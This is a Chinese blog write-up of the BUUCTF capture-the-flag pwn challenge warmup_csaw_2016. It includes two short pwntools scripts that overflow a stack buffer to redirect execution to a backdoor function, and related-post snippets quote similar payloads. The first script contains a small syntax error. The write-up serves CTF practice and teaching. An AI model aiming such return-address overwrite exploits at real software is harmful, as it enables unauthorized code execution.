BUUCTF warmup_csaw_2016 1

于 2023-09-10 12:11:21 发布
阅读量162 收藏
点赞数
分类专栏: # pwn 文章标签: buuctf ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56313338/article/details/132782823
版权

分析

查看文件信息

file warmup_csaw_2016

查看保护

在这里插入图片描述

64位,这里去了符号, 也就是说少了一些调试信息,不过问题不大
在这里插入图片描述

使用IDA64位, 找到main函数
在这里插入图片描述

可以看到这里会输出 sub_40060D 的地址

在这里插入图片描述
也就是说溢出到这里就拿到flag了

因为没有开启PIE,所以在IDA可以直接看到sub_40060D 的地址
在这里插入图片描述

exp

from pwn import *

context.arch = 'amd64
p = remote('node4.buuoj.cn',25580)
p.sendline(flat(['a'*0x40 , 'a'*8 , 0x40060D]))
p.interactive()

在这里插入图片描述

其他解法

因为这个程序没有PIE保护,所以我们可以通过静态文件得知函数的地址
如果开启PIE后,代码段和数据段的地址在运行时地址随机化了,我们就不能从IDA得到函数地址了
记得这题源代码直接给出了函数地址吗

在这里插入图片描述

泄露函数地址

通过读取该地址作为返回地址从而读取flag

exp

from pwn import *

context.arch = 'amd64'
p = remote('node4.buuoj.cn',27377)

p.recvuntil("WOW:0x")   # 接收到指定字符串停止
fun = int(p.recvline(),16)    # 将16进制的字符串转为数字
p.sendline(flat(['a'*0x40 , 'a'*8 , fun]))

p.interactive()
bug小空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF刷题之路-warmup_csaw_20161
qq_30528603的博客
05-27 300
大概明确函数的执行流程。而且我们在主函数一眼就看到一个危险函数gets,大概率就是个栈溢出。然后我们又在IDA中发现有system和一个后门函数,那这题就非常简单,跟上一题是一个思路的。那我们就直接栈溢出覆盖返回地址到后门函数,这题就做完了。在主函数中我们看到v5变量离rbp距离是0x40h,因为是64位程序还得加8才到返回地址。这题原本昨天就打算发的,刚做完电脑死机了。
warmup_csaw_2016 1
weixin_52034946的博客
01-13 801
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
最新发布
XDiku的博客
11-01 1295
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
buuctf|warmup_csaw_2016 1
m0_64236521的博客
04-15 1251
buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下,是64位文件 拉进ida,发现gets(v5),查看v5,明显的栈溢出 找到system,地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...
warmup_csaw_2016
weixin_56301399的博客
07-20 1329
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
0ctf_2016_warmup
05-17
2016年0ctfpwn题。
PyPI 官网下载 | warmup_scheduler-0.3.tar.gz
01-30
资源来自pypi官网。 资源全名:warmup_scheduler-0.3.tar.gz
markdown_warmup_html
05-28
markdown-warmup-html。
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
neo_warmup:热身 Neo4j
06-05
构建它: mvn clean package将 target/warmup-1.0.jar 复制到 Neo4j 服务器的 plugins/ 目录中。 通过在 conf/neo4j-server.properties 中添加一行来配置 Neo4j: org.neo4j.server.thirdparty_jaxrs_classes=...
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1227
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1648
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3246
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
BUUCTF warmup_csaw_2016 writeup
weixin_45999107的博客
02-09 2255
BUUCTF warmup_csaw_2016 打开IDA, 发现: PS:这个题直接把函数位置给了。。。 可以看出,gets绝对有问题,v5的长度为0x40,同时加上返回地址8个字节,所以要溢出总长度为0x48,在运行程序时可以看到sub_40060D的地址就为0x40060D… 所以构建payload:payload = ’a’ * 0x48 + p64(0x40060D),得flag...
CSAW CTF 2016 PWN quals-warmup
Hvnt3r的博客
03-06 2077
CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py flag.txt readme.txt warmupcsaw ctf 2016 quals-warmup file warmup warmup: ELF 64-bit LSB exec...
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 444
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 992
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
CTF warmup
热门推荐
艺博东的博客
09-28 1万+
难度系数: ★★ 题目来源: HCTF 题目描述: 暂无 题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、查看源代码(按F12或F12+Fn),出现以下代码。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值